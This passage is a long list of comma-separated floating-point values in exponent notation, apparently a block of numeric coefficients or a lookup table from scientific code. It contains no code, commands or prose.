0.52082047e-01,
0.49516134e-01,
0.46855822e-01,
0.44053324e-01,
0.41028392e-01,
0.37672661e-01,
0.33894073e-01,
0.29732887e-01,
0.25506891e-01,
0.21783372e-01,
0.18975813e-01,
0.16882956e-01,
0.14915733e-01,
0.12760971e-01,
0.10479322e-01,
0.81534600e-02,
0.57432470e-02,
0.31131236e-02,
-0.13105665e-04,
-0.34361165e-02,
-0.45660972e-02,
0.37977196e-01,
0.42716030e-01,
0.48617344e-01,
0.54660756e-01,
0.60114693e-01,
0.64529106e-01,
0.67770794e-01,
0.69969401e-01,
0.71370378e-01,
0.72196685e-01,
0.72596297e-01,
0.72655670e-01,
0.72426699e-01,
0.71944013e-01,
0.71233213e-01,
0.70314772e-01,
0.69206156e-01,
0.67923151e-01,
0.66480570e-01,
0.64892717e-01,
0.63173585e-01,
0.61336990e-01,
0.59396494e-01,
0.57365343e-01,
0.55256244e-01,
0.53080887e-01,
0.50849102e-01,
0.48567444e-01,
0.46237227e-01,
0.43851011e-01,
0.41386928e-01,
0.38799874e-01,
0.36011849e-01,
0.32912444e-01,
0.29396715e-01,
0.25476838e-01,
0.21440787e-01,
0.17856820e-01,
0.15185956e-01,
0.13268581e-01,
0.11497635e-01,
0.95190108e-02,
0.73810630e-02,
0.51771011e-02,
0.28821086e-02,
0.37416635e-03,
-0.26154167e-02,
-0.58998531e-02,
-0.68843709e-02,
0.35076261e-01,
0.39454699e-01,
0.44908728e-01,
0.50496329e-01,
0.55542119e-01,
0.59630550e-01,
0.62638551e-01,
0.64685628e-01,
0.65998107e-01,
0.66781543e-01,
0.67172192e-01,
0.67249492e-01,
0.67060962e-01,
0.66638172e-01,
0.66004358e-01,
0.65178059e-01,
0.64175054e-01,
0.63009582e-01,
0.61695036e-01,
0.60244419e-01,
0.58670532e-01,
0.56986067e-01,
0.55203587e-01,
0.53335473e-01,
0.51393870e-01,
0.49390342e-01,
0.47335327e-01,
0.45237295e-01,
0.43101642e-01,
0.40929142e-01,
0.38712744e-01,
0.36432110e-01,
0.34044892e-01,
0.31476185e-01,
0.28615938e-01,
0.25350343e-01,
0.21667363e-01,
0.17823832e-01,
0.14378536e-01,
0.11824818e-01,
0.10038571e-01,
0.84049767e-02,
0.65482627e-02,
0.45205113e-02,
0.24313403e-02,
0.26542676e-03,
-0.20983638e-02,
-0.49343021e-02,
-0.80712391e-02,
-0.89136148e-02,
0.32395583e-01,
0.36441319e-01,
0.41482292e-01,
0.46648715e-01,
0.51316999e-01,
0.55103421e-01,
0.57894230e-01,
0.59799597e-01,
0.61028276e-01,
0.61769772e-01,
0.62149592e-01,
0.62240742e-01,
0.62086754e-01,
0.61716419e-01,
0.61150856e-01,
0.60406826e-01,
0.59498589e-01,
0.58439020e-01,
0.57240289e-01,
0.55914193e-01,
0.54472402e-01,
0.52926507e-01,
0.51288098e-01,
0.49568728e-01,
0.47779780e-01,
0.45932278e-01,
0.44036478e-01,
0.42101391e-01,
0.40134147e-01,
0.38139164e-01,
0.36116980e-01,
0.34061395e-01,
0.31954251e-01,
0.29756844e-01,
0.27398031e-01,
0.24767753e-01,
0.21741455e-01,
0.18279733e-01,
0.14604551e-01,
0.11262298e-01,
0.87792939e-02,
0.70768204e-02,
0.55486909e-02,
0.38075072e-02,
0.19052560e-02,
-0.45109729e-04,
-0.20623163e-02,
-0.42746197e-02,
-0.69636726e-02,
-0.99668913e-02,
-0.10686405e-01,
0.29919144e-01,
0.33657782e-01,
0.38317338e-01,
0.43094639e-01,
0.47413833e-01,
0.50920542e-01,
0.53509615e-01,
0.55282630e-01,
0.56432150e-01,
0.57132918e-01,
0.57500545e-01,
0.57602141e-01,
0.57477590e-01,
0.57153169e-01,
0.56648072e-01,
0.55977501e-01,
0.55154376e-01,
0.54190353e-01,
0.53096451e-01,
0.51883381e-01,
0.50561778e-01,
0.49142279e-01,
0.47635533e-01,
0.46052203e-01,
0.44402875e-01,
0.42697888e-01,
0.40947042e-01,
0.39159160e-01,
0.37341885e-01,
0.35501439e-01,
0.33642113e-01,
0.31765264e-01,
0.29866640e-01,
0.27930658e-01,
0.25920473e-01,
0.23763975e-01,
0.21344284e-01,
0.18521296e-01,
0.15230944e-01,
0.11671958e-01,
0.83932094e-02,
0.59620556e-02,
0.43443809e-02,
0.29380166e-02,
0.13360849e-02,
-0.42020026e-03,
-0.22225457e-02,
-0.40951176e-02,
-0.61711343e-02,
-0.87360274e-02,
-0.11627702e-01,
-0.12245870e-01,
0.27632145e-01,
0.31087343e-01,
0.35394758e-01,
0.39812610e-01,
0.43809064e-01,
0.47056779e-01,
0.49458548e-01,
0.51108032e-01,
0.52182894e-01,
0.52844279e-01,
0.53198714e-01,
0.53307895e-01,
0.53208377e-01,
0.52924160e-01,
0.52472707e-01,
0.51867817e-01,
0.51121201e-01,
0.50243411e-01,
0.49244415e-01,
0.48133992e-01,
0.46921846e-01,
0.45617707e-01,
0.44231363e-01,
0.42772591e-01,
0.41251190e-01,
0.39676767e-01,
0.38058497e-01,
0.36404900e-01,
0.34723751e-01,
0.33022195e-01,
0.31306833e-01,
0.29583117e-01,
0.27853649e-01,
0.26114259e-01,
0.24346959e-01,
0.22509510e-01,
0.20522581e-01,
0.18262342e-01,
0.15582572e-01,
0.12412144e-01,
0.89437887e-02,
0.57348427e-02,
0.33833538e-02,
0.18811167e-02,
0.61761297e-03,
-0.83635934e-03,
-0.24498748e-02,
-0.41174246e-02,
-0.58653555e-02,
-0.78286622e-02,
-0.10294430e-01,
-0.13095230e-01,
-0.13630256e-01,
0.25520688e-01,
0.28714316e-01,
0.32696646e-01,
0.36782503e-01,
0.40480625e-01,
0.43488596e-01,
0.45716532e-01,
0.47250807e-01,
0.48255347e-01,
0.48878800e-01,
0.49219336e-01,
0.49333718e-01,
0.49255468e-01,
0.49006518e-01,
0.48602745e-01,
0.48056658e-01,
0.47378853e-01,
0.46578914e-01,
0.45665938e-01,
0.44648807e-01,
0.43536380e-01,
0.42337555e-01,
0.41061286e-01,
0.39716586e-01,
0.38312454e-01,
0.36857765e-01,
0.35361193e-01,
0.33831026e-01,
0.32275263e-01,
0.30701900e-01,
0.29118838e-01,
0.27533358e-01,
0.25950057e-01,
0.24367830e-01,
0.22775861e-01,
0.21148378e-01,
0.19438008e-01,
0.17566392e-01,
0.15416590e-01,
0.12849388e-01,
0.97933495e-02,
0.64339326e-02,
0.33275706e-02,
0.10872351e-02,
-0.28362754e-03,
-0.14064757e-02,
-0.27260752e-02,
-0.42158812e-02,
-0.57702521e-02,
-0.74158944e-02,
-0.92886547e-02,
-0.11677106e-01,
-0.14403825e-01,
-0.14870039e-01,
0.23571694e-01,
0.26523935e-01,
0.30206172e-01,
0.33985410e-01,
0.37407782e-01,
0.40193867e-01,
0.42260528e-01,
0.43687437e-01,
0.44625875e-01,
0.45212984e-01,
0.45539256e-01,
0.45656916e-01,
0.45596711e-01,
0.45378670e-01,
0.45017261e-01,
0.44523854e-01,
0.43908067e-01,
0.43178570e-01,
0.42343616e-01,
0.41411307e-01,
0.40389728e-01,
0.39287016e-01,
0.38111381e-01,
0.36871076e-01,
0.35574421e-01,
0.34229808e-01,
0.32845549e-01,
0.31430013e-01,
0.29991681e-01,
0.28539073e-01,
0.27080379e-01,
0.25622051e-01,
0.24167063e-01,
0.22712942e-01,
0.21250511e-01,
0.19763654e-01,
0.18227577e-01,
0.16602959e-01,
0.14823279e-01,
0.12781378e-01,
0.10339825e-01,
0.74180500e-02,
0.41875704e-02,
0.12003324e-02,
-0.92070986e-03,
-0.21659597e-02,
-0.31659470e-02,
-0.43731593e-02,
-0.57607451e-02,
-0.72222133e-02,
-0.87847579e-02,
-0.10585406e-01,
-0.12914552e-01,
-0.15580352e-01,
-0.15989216e-01,
0.21772955e-01,
0.24502428e-01,
0.27907638e-01,
0.31403694e-01,
0.34571216e-01,
0.37151974e-01,
0.39069071e-01,
0.40396009e-01,
0.41272413e-01,
0.41824844e-01,
0.42136710e-01,
0.42256072e-01,
0.42211138e-01,
0.42020235e-01,
0.41696560e-01,
0.41250426e-01,
0.40690560e-01,
0.40024836e-01,
0.39260726e-01,
0.38405582e-01,
0.37466776e-01,
0.36451757e-01,
0.35368055e-01,
0.34223344e-01,
0.33025496e-01,
0.31782612e-01,
0.30503126e-01,
0.29195679e-01,
0.27868953e-01,
0.26531136e-01,
0.25188750e-01,
0.23845278e-01,
0.22500057e-01,
0.21148371e-01,
0.19782964e-01,
0.18395819e-01,
0.16978383e-01,
0.15516935e-01,
0.13982293e-01,
0.12313342e-01,
0.10401287e-01,
0.81002032e-02,
0.53164582e-02,
0.22110264e-02,
-0.66281413e-03,
-0.26719193e-02,
-0.38054741e-02,
-0.47028475e-02,
-0.58184257e-02,
-0.71222009e-02,
-0.85073700e-02,
-0.10002246e-01,
-0.11745773e-01,
-0.14030821e-01,
-0.16646272e-01,
-0.17007222e-01,
0.20113155e-01,
0.22637051e-01,
0.25786523e-01,
0.29021049e-01,
0.31953044e-01,
0.34343820e-01,
0.36122233e-01,
0.37356097e-01,
0.38174324e-01,
0.38693711e-01,
0.38991190e-01,
0.39110996e-01,
0.39079025e-01,
0.38912032e-01,
0.38622018e-01,
0.38218360e-01,
0.37708975e-01,
0.37100986e-01,
0.36401182e-01,
0.35616249e-01,
0.34752883e-01,
0.33817910e-01,
0.32818370e-01,
0.31761579e-01,
0.30655265e-01,
0.29507659e-01,
0.28327364e-01,
0.27123058e-01,
0.25902657e-01,
0.24672238e-01,
0.23434937e-01,
0.22190256e-01,
0.20934626e-01,
0.19663457e-01,
0.18373784e-01,
0.17065847e-01,
0.15741942e-01,
0.14402619e-01,
0.13038933e-01,
0.11620902e-01,
0.10082259e-01,
0.83062556e-02,
0.61375611e-02,
0.34738728e-02,
0.47380762e-03,
-0.23008718e-02,
-0.42078327e-02,
-0.52424278e-02,
-0.60545313e-02,
-0.70956550e-02,
-0.83303098e-02,
-0.96523445e-02,
-0.11092181e-01,
-0.12791218e-01,
-0.15045415e-01,
-0.17619489e-01,
-0.17940814e-01,
0.18581720e-01,
0.20915883e-01,
0.23829265e-01,
0.26822245e-01,
0.29536562e-01,
0.31751547e-01,
0.33401374e-01,
0.34548633e-01,
0.35312355e-01,
0.35800364e-01,
0.36083620e-01,
0.36202855e-01,
0.36181841e-01,
0.36035892e-01,
0.35775941e-01,
0.35410490e-01,
0.34946699e-01,
0.34391019e-01,
0.33749603e-01,
0.33028524e-01,
0.32233991e-01,
0.31372394e-01,
0.30450473e-01,
0.29475490e-01,
0.28455326e-01,
0.27398327e-01,
0.26312927e-01,
0.25206672e-01,
0.24085123e-01,
0.22950860e-01,
0.21803081e-01,
0.20638589e-01,
0.19453924e-01,
0.18248010e-01,
0.17023819e-01,
0.15788162e-01,
0.14549590e-01,
0.13314429e-01,
0.12082065e-01,
0.10838719e-01,
0.95478874e-02,
0.81366943e-02,
0.64820210e-02,
0.44224774e-02,
0.18523625e-02,
-0.10648414e-02,
-0.37534775e-02,
-0.55650654e-02,
-0.65100682e-02,
-0.72507914e-02,
-0.82312562e-02,
-0.94086677e-02,
-0.10678349e-01,
-0.12073795e-01,
-0.13739666e-01,
-0.15975196e-01,
-0.18515551e-01,
-0.18804787e-01,
0.17168749e-01,
0.19327780e-01,
0.22023177e-01,
0.24793051e-01,
0.27306184e-01,
0.29358532e-01,
0.30889180e-01,
0.31955894e-01,
0.32668613e-01,
0.33126883e-01,
0.33396173e-01,
0.33513986e-01,
0.33502162e-01,
0.33374704e-01,
0.33141572e-01,
0.32810479e-01,
0.32387879e-01,
0.31879608e-01,
0.31291280e-01,
0.30628527e-01,
0.29897207e-01,
0.29103544e-01,
0.28254325e-01,
0.27356898e-01,
0.26419124e-01,
0.25448931e-01,
0.24453351e-01,
0.23437385e-01,
0.22403084e-01,
0.21349376e-01,
0.20273272e-01,
0.19171963e-01,
0.18045446e-01,
0.16897894e-01,
0.15737535e-01,
0.14574960e-01,
0.13420397e-01,
0.12280968e-01,
0.11158198e-01,
0.10045296e-01,
0.89227157e-02,
0.77492185e-02,
0.64479085e-02,
0.48916428e-02,
0.29151232e-02,
0.41272587e-03,
-0.24413855e-02,
-0.50533284e-02,
-0.67725605e-02,
-0.76342914e-02,
-0.83150435e-02,
-0.92462925e-02,
-0.10376302e-01,
-0.11603034e-01,
-0.12963645e-01,
-0.14606736e-01,
-0.16835131e-01,
-0.19348454e-01,
-0.19612487e-01,
0.15865134e-01,
0.17862506e-01,
0.20356622e-01,
0.22920400e-01,
0.25247563e-01,
0.27149413e-01,
0.28569562e-01,
0.29561354e-01,
0.30226331e-01,
0.30656436e-01,
0.30912070e-01,
0.31027781e-01,
0.31023609e-01,
0.30912362e-01,
0.30703111e-01,
0.30402854e-01,
0.30017478e-01,
0.29552329e-01,
0.29012615e-01,
0.28403712e-01,
0.27731372e-01,
0.27001891e-01,
0.26222091e-01,
0.25399221e-01,
0.24540421e-01,
0.23651907e-01,
0.22738006e-01,
0.21800319e-01,
0.20837659e-01,
0.19847298e-01,
0.18827075e-01,
0.17777784e-01,
0.16704248e-01,
0.15615269e-01,
0.14521973e-01,
0.13435473e-01,
0.12364727e-01,
0.11315233e-01,
0.10288181e-01,
0.92796814e-02,
0.82787825e-02,
0.72630350e-02,
0.61889994e-02,
0.49772034e-02,
0.34969368e-02,
0.15794969e-02,
-0.87806711e-03,
-0.36851568e-02,
-0.62257764e-02,
-0.78527220e-02,
-0.86356523e-02,
-0.92662042e-02,
-0.10158284e-01,
-0.11249557e-01,
-0.12441714e-01,
-0.13776368e-01,
-0.15406553e-01,
-0.17638773e-01,
-0.20130811e-01,
-0.20375945e-01,
0.14662431e-01,
0.16510550e-01,
0.18818781e-01,
0.21192145e-01,
0.23347380e-01,
0.25109937e-01,
0.26427617e-01,
0.27349673e-01,
0.27969934e-01,
0.28373329e-01,
0.28615609e-01,
0.28728599e-01,
0.28730700e-01,
0.28633634e-01,
0.28445678e-01,
0.28173234e-01,
0.27821736e-01,
0.27396221e-01,
0.26901733e-01,
0.26343603e-01,
0.25727598e-01,
0.25059966e-01,
0.24347208e-01,
0.23595579e-01,
0.22810331e-01,
0.21994932e-01,
0.21150416e-01,
0.20275565e-01,
0.19368108e-01,
0.18426621e-01,
0.17452605e-01,
0.16451407e-01,
0.15432071e-01,
0.14405738e-01,
0.13383573e-01,
0.12374919e-01,
0.11386278e-01,
0.10420920e-01,
0.94791828e-02,
0.85583618e-02,
0.76520443e-02,
0.67478423e-02,
0.58222217e-02,
0.48302943e-02,
0.36898023e-02,
0.22657616e-02,
0.38620809e-03,
-0.20464570e-02,
-0.48193890e-02,
-0.72907535e-02,
-0.88232690e-02,
-0.95311515e-02,
-0.10120570e-01,
-0.10982438e-01,
-0.12042844e-01,
-0.13208187e-01,
-0.14525170e-01,
-0.16151898e-01,
-0.18398402e-01,
-0.20873869e-01,
-0.21105917e-01,
0.13552637e-01,
0.15262923e-01,
0.17399436e-01,
0.19596824e-01,
0.21593064e-01,
0.23226669e-01,
0.24449309e-01,
0.25306473e-01,
0.25884863e-01,
0.26262935e-01,
0.26492154e-01,
0.26601870e-01,
0.26609030e-01,
0.26524415e-01,
0.26355645e-01,
0.26108669e-01,
0.25788641e-01,
0.25400463e-01,
0.24949163e-01,
0.24440058e-01,
0.23878768e-01,
0.23270955e-01,
0.22621866e-01,
0.21935685e-01,
0.21214921e-01,
0.20460036e-01,
0.19669790e-01,
0.18842377e-01,
0.17977156e-01,
0.17076379e-01,
0.16145866e-01,
0.15194753e-01,
0.14234038e-01,
0.13274660e-01,
0.12325864e-01,
0.11394359e-01,
0.10484057e-01,
0.95965564e-02,
0.87314118e-02,
0.78865895e-02,
0.70581776e-02,
0.62391688e-02,
0.54168063e-02,
0.45667454e-02,
0.36422682e-02,
0.25576062e-02,
0.11724485e-02,
-0.68855018e-03,
-0.31142109e-02,
-0.58629848e-02,
-0.82644373e-02,
-0.96990969e-02,
-0.10335494e-01,
-0.10892544e-01,
-0.11732457e-01,
-0.12769138e-01,
-0.13914877e-01,
-0.15221934e-01,
-0.16854212e-01,
-0.19125070e-01,
-0.21587910e-01,
-0.21812512e-01,
0.12528375e-01,
0.14111324e-01,
0.16089143e-01,
0.18123835e-01,
0.19972973e-01,
0.21487134e-01,
0.22621555e-01,
0.23418266e-01,
0.23957409e-01,
0.24311502e-01,
0.24528088e-01,
0.24634261e-01,
0.24645658e-01,
0.24572272e-01,
0.24421265e-01,
0.24198342e-01,
0.23908518e-01,
0.23556618e-01,
0.23147549e-01,
0.22686291e-01,
0.22177676e-01,
0.21625938e-01,
0.21034168e-01,
0.20403879e-01,
0.19734910e-01,
0.19025959e-01,
0.18275727e-01,
0.17484382e-01,
0.16654858e-01,
0.15793348e-01,
0.14909030e-01,
0.14012692e-01,
0.13114928e-01,
0.12224767e-01,
0.11348879e-01,
0.10491370e-01,
0.96542966e-02,
0.88380333e-02,
0.80419006e-02,
0.72643128e-02,
0.65027624e-02,
0.57532680e-02,
0.50087180e-02,
0.42559886e-02,
0.34697335e-02,
0.26006724e-02,
0.15582409e-02,
0.19586713e-03,
-0.16648462e-02,
-0.41000666e-02,
-0.68322704e-02,
-0.91604441e-02,
-0.10493010e-01,
-0.11061922e-01,
-0.11595163e-01,
-0.12420692e-01,
-0.13440105e-01,
-0.14572812e-01,
-0.15877264e-01,
-0.17524028e-01,
-0.19829245e-01,
-0.22282675e-01,
-0.22505168e-01,
0.11582712e-01,
0.13047962e-01,
0.14879054e-01,
0.16763248e-01,
0.18476224e-01,
0.19879704e-01,
0.20932244e-01,
0.21672688e-01,
0.22175148e-01,
0.22506684e-01,
0.22711273e-01,
0.22814000e-01,
0.22829419e-01,
0.22766909e-01,
0.22633271e-01,
0.22434004e-01,
0.22174012e-01,
0.21857906e-01,
0.21490037e-01,
0.21074377e-01,
0.20614149e-01,
0.20111440e-01,
0.19566908e-01,
0.18979838e-01,
0.18348834e-01,
0.17672971e-01,
0.16953107e-01,
0.16192837e-01,
0.15398719e-01,
0.14579884e-01,
0.13746735e-01,
0.12909485e-01,
0.12076905e-01,
0.11255554e-01,
0.10449625e-01,
0.96614184e-02,
0.88916803e-02,
0.81402799e-02,
0.74064764e-02,
0.66891308e-02,
0.59866421e-02,
0.52965824e-02,
0.46150312e-02,
0.39348379e-02,
0.32422331e-02,
0.25101355e-02,
0.16859862e-02,
0.67323016e-03,
-0.68223715e-03,
-0.25608686e-02,
-0.50209761e-02,
-0.77415816e-02,
-0.99905552e-02,
-0.11216282e-01,
-0.11722405e-01,
-0.12240239e-01,
-0.13058126e-01,
-0.14066087e-01,
-0.15192053e-01,
-0.16501144e-01,
-0.18171404e-01,
-0.20520791e-01,
-0.22966992e-01,
-0.23192288e-01,
0.10709423e-01,
0.12065823e-01,
0.13761187e-01,
0.15506121e-01,
0.17093049e-01,
0.18394005e-01,
0.19370625e-01,
0.20058842e-01,
0.20527244e-01,
0.20837912e-01,
0.21031609e-01,
0.21131653e-01,
0.21151649e-01,
0.21100447e-01,
0.20984545e-01,
0.20809161e-01,
0.20578744e-01,
0.20297162e-01,
0.19967660e-01,
0.19592566e-01,
0.19173032e-01,
0.18708948e-01,
0.18199200e-01,
0.17642427e-01,
0.17038029e-01,
0.16387362e-01,
0.15694451e-01,
0.14966104e-01,
0.14211375e-01,
0.13440318e-01,
0.12662663e-01,
0.11886760e-01,
0.11119010e-01,
0.10363686e-01,
0.96232807e-02,
0.88988189e-02,
0.81905108e-02,
0.74980101e-02,
0.68207132e-02,
0.61578541e-02,
0.55083996e-02,
0.48709009e-02,
0.42431629e-02,
0.36212225e-02,
0.29974312e-02,
0.23571376e-02,
0.16709621e-02,
0.88186091e-03,
-0.11385441e-03,
-0.14786492e-02,
-0.33936626e-02,
-0.58928211e-02,
-0.86036716e-02,
-0.10764806e-01,
-0.11878857e-01,
-0.12327690e-01,
-0.12838322e-01,
-0.13654754e-01,
-0.14656777e-01,
-0.15782116e-01,
-0.17102929e-01,
-0.18805560e-01,
-0.21208614e-01,
-0.23648826e-01,
-0.23881109e-01,
0.99031366e-02,
0.11158862e-01,
0.12728675e-01,
0.14344782e-01,
0.15815102e-01,
0.17021233e-01,
0.17927697e-01,
0.18567791e-01,
0.19005040e-01,
0.19296985e-01,
0.19481450e-01,
0.19580156e-01,
0.19605840e-01,
0.19566806e-01,
0.19469030e-01,
0.19317091e-01,
0.19114554e-01,
0.18864036e-01,
0.18567108e-01,
0.18224217e-01,
0.17834747e-01,
0.17397350e-01,
0.16910696e-01,
0.16374495e-01,
0.15790507e-01,
0.15163027e-01,
0.14498919e-01,
0.13806998e-01,
0.13096904e-01,
0.12377877e-01,
0.11657882e-01,
0.10943062e-01,
0.10237600e-01,
0.95441425e-02,
0.88640014e-02,
0.81976959e-02,
0.75451867e-02,
0.69061988e-02,
0.62803319e-02,
0.56670737e-02,
0.50658169e-02,
0.44758078e-02,
0.38957228e-02,
0.33232321e-02,
0.27542519e-02,
0.21804536e-02,
0.15856215e-02,
0.93752530e-03,
0.17370789e-03,
-0.81816822e-03,
-0.22095586e-02,
-0.41797617e-02,
-0.67304755e-02,
-0.94296988e-02,
-0.11491459e-01,
-0.12489353e-01,
-0.12887697e-01,
-0.13399359e-01,
-0.14220017e-01,
-0.15221213e-01,
-0.16351623e-01,
-0.17690992e-01,
-0.19434931e-01,
-0.21900531e-01,
-0.24334403e-01,
-0.24576908e-01,
0.91596041e-02,
0.10322293e-01,
0.11776099e-01,
0.13273214e-01,
0.14635916e-01,
0.15754675e-01,
0.16596718e-01,
0.17192930e-01,
0.17602194e-01,
0.17877869e-01,
0.18055072e-01,
0.18153975e-01,
0.18186348e-01,
0.18159697e-01,
0.18079169e-01,
0.17948311e-01,
0.17769367e-01,
0.17543392e-01,
0.17270328e-01,
0.16949220e-01,
0.16578663e-01,
0.16157566e-01,
0.15685990e-01,
0.15165905e-01,
0.14601668e-01,
0.14000042e-01,
0.13369541e-01,
0.12719298e-01,
0.12057992e-01,
0.11393145e-01,
0.10730589e-01,
0.10074451e-01,
0.94274255e-02,
0.87909503e-02,
0.81658233e-02,
0.75523388e-02,
0.69505223e-02,
0.63602584e-02,
0.57813367e-02,
0.52134916e-02,
0.46564899e-02,
0.41098930e-02,
0.35728957e-02,
0.30442516e-02,
0.25214758e-02,
0.19998695e-02,
0.14702382e-02,
0.91451913e-03,
0.29673893e-03,
-0.45211281e-03,
-0.14543475e-02,
-0.28908835e-02,
-0.49353936e-02,
-0.75476863e-02,
-0.10228912e-01,
-0.12177330e-01,
-0.13055839e-01,
-0.13411977e-01,
-0.13932705e-01,
-0.14762470e-01,
-0.15767431e-01,
-0.16908331e-01,
-0.18272618e-01,
-0.20066334e-01,
-0.22602497e-01,
-0.25027955e-01,
-0.25282444e-01,
0.84757134e-02,
0.95526502e-02,
0.10899562e-01,
0.12287115e-01,
0.13550865e-01,
0.14589507e-01,
0.15372781e-01,
0.15929360e-01,
0.16313823e-01,
0.16575595e-01,
0.16747160e-01,
0.16847055e-01,
0.16885890e-01,
0.16870106e-01,
0.16803687e-01,
0.16688865e-01,
0.16526472e-01,
0.16316228e-01,
0.16057082e-01,
0.15747746e-01,
0.15387391e-01,
0.14976392e-01,
0.14516956e-01,
0.14013476e-01,
0.13472388e-01,
0.12901680e-01,
0.12309901e-01,
0.11705250e-01,
0.11094769e-01,
0.10483908e-01,
0.98766321e-02,
0.92755975e-02,
0.86824028e-02,
0.80980305e-02,
0.75229523e-02,
0.69574793e-02,
0.64018168e-02,
0.58560292e-02,
0.53201127e-02,
0.47941157e-02,
0.42779413e-02,
0.37713288e-02,
0.32739611e-02,
0.27850254e-02,
0.23029358e-02,
0.18249402e-02,
0.13457378e-02,
0.85484359e-03,
0.33187922e-03,
-0.26360160e-03,
-0.10086164e-02,
-0.20368681e-02,
-0.35384803e-02,
-0.56763412e-02,
-0.83571654e-02,
-0.11009140e-01,
-0.12828228e-01,
-0.13585953e-01,
-0.13909469e-01,
-0.14446771e-01,
-0.15289789e-01,
-0.16302353e-01,
-0.17458308e-01,
-0.18853234e-01,
-0.20704713e-01,
-0.23318050e-01,
-0.25730822e-01,
-0.25997423e-01,
0.78488868e-02,
0.88471249e-02,
0.10095963e-01,
0.11383073e-01,
0.12556248e-01,
0.13521745e-01,
0.14251599e-01,
0.14772387e-01,
0.15134628e-01,
0.15383984e-01,
0.15550311e-01,
0.15650392e-01,
0.15693463e-01,
0.15684696e-01,
0.15626790e-01,
0.15520756e-01,
0.15366406e-01,
0.15162837e-01,
0.14909022e-01,
0.14604477e-01,
0.14249890e-01,
0.13847613e-01,
0.13401926e-01,
0.12918934e-01,
0.12406076e-01,
0.11871213e-01,
0.11321891e-01,
0.10764673e-01,
0.10204747e-01,
0.96458644e-02,
0.90905391e-02,
0.85403854e-02,
0.79964781e-02,
0.74595166e-02,
0.69300104e-02,
0.64083328e-02,
0.58948221e-02,
0.53897803e-02,
0.48935004e-02,
0.44061504e-02,
0.39277528e-02,
0.34583132e-02,
0.29976317e-02,
0.25451381e-02,
0.20998786e-02,
0.16600611e-02,
0.12224072e-02,
0.78081363e-03,
0.32335857e-03,
-0.17330737e-03,
-0.75507897e-03,
-0.15084407e-02,
-0.25801368e-02,
-0.41686138e-02,
-0.64185774e-02,
-0.91707250e-02,
-0.11776590e-01,
-0.13448806e-01,
-0.14086716e-01,
-0.14388485e-01,
-0.14948927e-01,
-0.15807996e-01,
-0.16831016e-01,
-0.18005654e-01,
-0.19435892e-01,
-0.21352261e-01,
-0.24047775e-01,
-0.26441328e-01,
-0.26718097e-01,
0.72761136e-02,
0.82024941e-02,
0.93617616e-02,
0.10557142e-01,
0.11647610e-01,
0.12546310e-01,
0.13227314e-01,
0.13715181e-01,
0.14056569e-01,
0.14293512e-01,
0.14453239e-01,
0.14550695e-01,
0.14593684e-01,
0.14586142e-01,
0.14529741e-01,
0.14424738e-01,
0.14270628e-01,
0.14066807e-01,
0.13813181e-01,
0.13510717e-01,
0.13161879e-01,
0.12770806e-01,
0.12343196e-01,
0.11885820e-01,
0.11405828e-01,
0.10910179e-01,
0.10404940e-01,
0.98949000e-02,
0.93836067e-02,
0.88735307e-02,
0.83662188e-02,
0.78627151e-02,
0.73637851e-02,
0.68700551e-02,
0.63821264e-02,
0.59005306e-02,
0.54257177e-02,
0.49582440e-02,
0.44985944e-02,
0.40470236e-02,
0.36037776e-02,
0.31689804e-02,
0.27423929e-02,
0.23237155e-02,
0.19122795e-02,
0.15068311e-02,
0.11052121e-02,
0.70368673e-03,
0.29509133e-03,
-0.13425731e-03,
-0.61128259e-03,
-0.11886779e-02,
-0.19643204e-02,
-0.30994283e-02,
-0.47985963e-02,
-0.71782242e-02,
-0.99987285e-02,
-0.12535306e-01,
-0.14042607e-01,
-0.14564627e-01,
-0.14856030e-01,
-0.15444703e-01,
-0.16321121e-01,
-0.17356047e-01,
-0.18551625e-01,
-0.20020738e-01,
-0.22008330e-01,
-0.24788912e-01,
-0.27153788e-01,
-0.27435988e-01,
0.67528659e-02,
0.76138428e-02,
0.86914934e-02,
0.98031582e-02,
0.10817948e-01,
0.11655207e-01,
0.12290766e-01,
0.12747228e-01,
0.13067597e-01,
0.13290452e-01,
0.13440499e-01,
0.13530949e-01,
0.13568352e-01,
0.13555742e-01,
0.13494246e-01,
0.13384038e-01,
0.13225075e-01,
0.13017694e-01,
0.12763139e-01,
0.12463950e-01,
0.12124085e-01,
0.11748808e-01,
0.11344243e-01,
0.10916842e-01,
0.10472860e-01,
0.10017826e-01,
0.95562525e-02,
0.90915291e-02,
0.86259460e-02,
0.81609664e-02,
0.76976661e-02,
0.72367843e-02,
0.67789229e-02,
0.63247578e-02,
0.58749435e-02,
0.54301512e-02,
0.49911011e-02,
0.45584417e-02,
0.41327197e-02,
0.37144551e-02,
0.33040245e-02,
0.29014633e-02,
0.25067537e-02,
0.21196145e-02,
0.17395143e-02,
0.13655368e-02,
0.99622435e-03,
0.62900473e-03,
0.25951708e-03,
-0.12054403e-03,
-0.52714220e-03,
-0.99177333e-03,
-0.15755766e-02,
-0.23898906e-02,
-0.36114564e-02,
-0.54468848e-02,
-0.79709487e-02,
-0.10849346e-01,
-0.13287026e-01,
-0.14611776e-01,
-0.15024997e-01,
-0.15317407e-01,
-0.15937271e-01,
-0.16830366e-01,
-0.17877102e-01,
-0.19094490e-01,
-0.20604689e-01,
-0.22668475e-01,
-0.25534086e-01,
-0.27857255e-01,
-0.28136132e-01,
0.62725060e-02,
0.70738452e-02,
0.80769034e-02,
0.91117928e-02,
0.10056756e-01,
0.10836687e-01,
0.11428916e-01,
0.11854174e-01,
0.12152059e-01,
0.12357980e-01,
0.12494393e-01,
0.12573079e-01,
0.12599719e-01,
0.12576928e-01,
0.12505878e-01,
0.12387235e-01,
0.12221836e-01,
0.12011216e-01,
0.11757963e-01,
0.11465836e-01,
0.11139663e-01,
0.10784952e-01,
0.10407481e-01,
0.10012860e-01,
0.96060764e-02,
0.91912504e-02,
0.87715685e-02,
0.83493032e-02,
0.79259127e-02,
0.75023416e-02,
0.70792502e-02,
0.66572730e-02,
0.62370505e-02,
0.58192150e-02,
0.54045119e-02,
0.49937805e-02,
0.45878929e-02,
0.41875835e-02,
0.37935111e-02,
0.34063701e-02,
0.30265125e-02,
0.26541308e-02,
0.22892184e-02,
0.19315761e-02,
0.15806772e-02,
0.12358783e-02,
0.89602108e-03,
0.55933301e-03,
0.22290465e-03,
-0.11837736e-03,
-0.47439354e-03,
-0.86409569e-03,
-0.13247277e-02,
-0.19277434e-02,
-0.28001412e-02,
-0.41344408e-02,
-0.61328700e-02,
-0.88115418e-02,
-0.11727598e-01,
-0.14030309e-01,
-0.15156906e-01,
-0.15471662e-01,
-0.15775396e-01,
-0.16426805e-01,
-0.17333917e-01,
-0.18390546e-01,
